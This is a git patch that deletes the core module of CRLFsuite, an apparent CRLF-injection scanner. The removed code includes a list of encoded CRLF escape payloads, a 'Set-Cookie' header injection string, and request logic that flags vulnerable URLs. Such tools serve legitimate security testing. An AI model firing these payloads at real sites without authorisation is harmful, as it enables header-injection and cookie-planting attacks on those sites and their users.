From 73bec46e277cbc17d04d1661af532d70a517e68c Mon Sep 17 00:00:00 2001 From: Nefcore Security <99230389+Nefcore@users.noreply.github.com> Date: Sat, 11 Jun 2022 03:56:13 +0000 Subject: [PATCH] Delete crlfsuite/core directory --- crlfsuite/core/__init__.py | 1 - crlfsuite/core/cli.py | 59 -------------------------- crlfsuite/core/config.py | 3 -- crlfsuite/core/crlfscanner.py | 33 --------------- crlfsuite/core/logger.py | 80 ----------------------------------- 5 files changed, 176 deletions(-) delete mode 100644 crlfsuite/core/__init__.py delete mode 100644 crlfsuite/core/cli.py delete mode 100644 crlfsuite/core/config.py delete mode 100644 crlfsuite/core/crlfscanner.py delete mode 100644 crlfsuite/core/logger.py diff --git a/crlfsuite/core/__init__.py b/crlfsuite/core/__init__.py deleted file mode 100644 index 8b13789..0000000 --- a/crlfsuite/core/__init__.py +++ /dev/null @@ -1 +0,0 @@ - diff --git a/crlfsuite/core/cli.py b/crlfsuite/core/cli.py deleted file mode 100644 index e698683..0000000 --- a/crlfsuite/core/cli.py +++ /dev/null @@ -1,59 +0,0 @@ -# -*- coding: utf-8 -*- - -import argparse -from crlfsuite.utils.utils import get_user_agent, parse_cookies, parse_post_data -from crlfsuite.core.logger import banner - -parser = argparse.ArgumentParser() -required_grp = parser.add_argument_group('Main options') -required_grp.add_argument('-u', '--url', dest='url', help='Specify the target URL (Example: -u https://google.com)') -required_grp.add_argument('-i', '--import-urls', help='Import targets from the file (Example: -i targets.txt)') -required_grp.add_argument('-s', '--stdin', help='Scan URLs from stdin', action="store_true") -required_grp.add_argument('-o', '--output', help='Path for output file (Example: /home/devansh/output.txt), default is output.txt', default='output.txt') -request_grp = parser.add_argument_group('Request options') -request_grp.add_argument('-m','--method', dest='method', help='Request method (GET/POST), Default is GET', default="GET") -request_grp.add_argument('-d','--data', dest='data', help='POST data (Example: --data "squery=google&data=hacked")') -request_grp.add_argument('-uA','--user-agent', help='Specify User-Agent (Example: Mozilla/5.0 (X11; Linux i586; rv:63.0) Gecko/20100101 Firefox/63.0).', default=get_user_agent()) -request_grp.add_argument('-To','--timeout', help='Connection timeout, default is 15', default=15) -request_grp.add_argument('-c','--cookies', help='Specify cookies if required (Example: --cookies "PASS=TEST; hack=hack")') -request_grp.add_argument('-v','--verify', help='Verify SSL cert, Default is false', default=False, action='store_true') -other_grp = parser.add_argument_group('Other options') -other_grp.add_argument('-t', '--threads', dest='threads', help='Number of concurrent threads, default is 50.',default=50, type=int) -other_grp.add_argument('-sL', '--silent', help='Skip banner and args info (direct output).', action="store_true") -other_grp.add_argument('-sP', '--show-payloads', help='Show all the available CRLF payloads', action='store_true') - -args = parser.parse_args() -url = args.url -urls = args.import_urls -method = args.method -data = args.data -user_agent = args.user_agent -timeout = args.timeout -cookies = args.cookies -s_payloads = args.show_payloads -output_file = args.output -verify = args.verify -threads = args.threads -std = args.stdin -silent = args.silent - -if not silent: - print(banner) - -read_urls = "" - -if urls: - with open(urls, 'r') as targets: - read_urls = targets.read().splitlines() -else: - pass - -if data: - new_data = parse_post_data(data) -else: - pass - -if cookies: - new_cookies = parse_cookies(cookies) -else: - pass diff --git a/crlfsuite/core/config.py b/crlfsuite/core/config.py deleted file mode 100644 index cdfd272..0000000 --- a/crlfsuite/core/config.py +++ /dev/null @@ -1,3 +0,0 @@ -vuln_urls = [] #to access vulnerable URLs globally -escape_chars = ['%0d','%0a', '%0d%20', '%0a%20' , '%3f' , '%0d%0a', '%23%0d', '%23%0a', '%23%0d%0a', '%u000a', '%25%30%61', '%25%30a', '%3f%0d', '%3f%0d%0a', '%3f%0a' , '%%0a0a', '%u000d', '%u0000', '%0d%09', '%0d%0a%09', '%0d%0a%20' , '%25250a', '%250a', '%2F..%0d%0a', '%2f%2e%2e%0d%0a', '%25%30' , '%2e%2e%2f%0d%0a', '%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D', '%E5%98%8A%E5%98%8D', '%e5%98%8a%e5%98%8d%0a', '%e5%98%8a%e5%98%8d%0d', '%e5%98%8a%e5%98%8d%0d%0a' , f"\\r", f"\\r\\n", f"\\r\\t", f"\\r\\n\\t", f"\\r%20", f"\\r\\n%20"] -starting_strings = ["crlfsuite", "?crlfsuite=", "#", '__session_start__/'] \ No newline at end of file diff --git a/crlfsuite/core/crlfscanner.py b/crlfsuite/core/crlfscanner.py deleted file mode 100644 index 6dc46dc..0000000 --- a/crlfsuite/core/crlfscanner.py +++ /dev/null @@ -1,33 +0,0 @@ -# -*- coding: utf-8 -*- - -import requests -import warnings -from crlfsuite.core.config import vuln_urls -from crlfsuite.core.cli import output_file - -warnings.filterwarnings('ignore') - -def crlfscanner(url, method, cookies, data, user_agent, timeout, verify): - try: - if method == "POST": - req = requests.post(url.strip(), data=data, cookies=cookies, headers=user_agent, timeout=timeout, verify=verify) - if 'param' in req.cookies.get_dict() and 'crlfsuite' in req.cookies.get_dict().values(): - vuln_urls.append(url) - with open(output_file, 'a') as output: - output.write(url.strip()) - output.write('\n') - output.close() - else: - pass - else: - req = requests.get(url.strip(), cookies=cookies, headers=user_agent, timeout=timeout, verify=verify) - if 'param' in req.cookies.get_dict() and 'crlfsuite' in req.cookies.get_dict().values(): - vuln_urls.append(url) - with open(output_file, 'a') as output: - output.write(url.strip()) - output.write('\n') - output.close() - else: - pass - except Exception: - pass \ No newline at end of file diff --git a/crlfsuite/core/logger.py b/crlfsuite/core/logger.py deleted file mode 100644 index 2541222..0000000 --- a/crlfsuite/core/logger.py +++ /dev/null @@ -1,80 +0,0 @@ -# -*- coding: utf-8 -*- - -from colorama import Fore as clr, Style -from crlfsuite.core.config import escape_chars, starting_strings -cyan = clr.CYAN -green = clr.LIGHTGREEN_EX -yellow = clr.LIGHTYELLOW_EX -red = clr.RED -bright = Style.BRIGHT -blue = clr.BLUE -reset = Style.RESET_ALL - -banner = f""" - ______ ______ __ ______ ______ __ __ __ ______ ______ -/\ ___\ /\ == \ /\ \ /\ ___\ /\ ___\ /\ \/\ \ /\ \ /\__ _\ /\ ___\ -\ \ \____ \ \ __< \ \ \____ \ \ __\ \ \___ \ \ \ \_\ \ \ \ \ \/_/\ \/ \ \ __\ - \ \_____\ \ \_\ \_\ \ \_____\ \ \_\ \/\_____\ \ \_____\ \ \_\ \ \_\ \ \_____\ - \/_____/ \/_/ /_/ \/_____/ \/_/ \/_____/ \/_____/ \/_/ \/_/ \/_____/ v1.4.0 - - ({green}\x1B[3mBy Nefcore Security\x1B[0m{reset}) -""" - -def good(msg): - print("[" + green + bright +'VLN' + reset + '] '+msg) - -def bad(msg): - print("[" + clr.LIGHTMAGENTA_EX + bright + 'NOT VLN' + reset + '] '+msg) - -def error(msg): - print("[" + red + bright +'ERR' + reset + ']',msg) - -def info(msg): - print("[" + blue + 'INF' + reset + "] "+msg) - -def warn(msg): - print("[" + yellow + 'WRN' + reset + "] "+msg) - -def args_info(url, urls, stdin, output, method, data, cookies, timeout, user_agent, verify, threads): - if url: - print(':: TARGET : %s' % url) - elif urls: - print(':: TARGET : %s' % urls) - elif stdin: - print(':: TARGET : Stdin') - else: - print(':: TARGET : None') - - print(':: OUTPUT : %s' % output) - - print(':: THREADS : %i' % threads) - print(':: METHOD : %s' % method) - - if data: - print(':: DATA : %s' % data) - - if cookies: - print(':: COOKIES : %s' % cookies) - - print(':: TIMEOUT : %i' % timeout) - print(':: USER-AGENT : %s' % user_agent) - - if verify: - print(':: VERIFY : True') - else: - print(':: VERIFY : False') - print('') - -def show_payloads_log(): - print('') - print('INJECTION') - print('========='+'\n') - print(f'{bright}[{green}+{reset}{bright}]{reset}','Set-Cookie:param=crlfsuite;') - print('\n'+'APPEND STRINGS') - print('=============='+'\n') - for appstr in starting_strings: - print(f'{bright}[{green}+{reset}{bright}]{reset}',appstr) - print('\n'+'ESCAPE CHARS') - print('============'+'\n') - for char in escape_chars: - print(f'{bright}[{green}+{reset}{bright}]{reset}',char)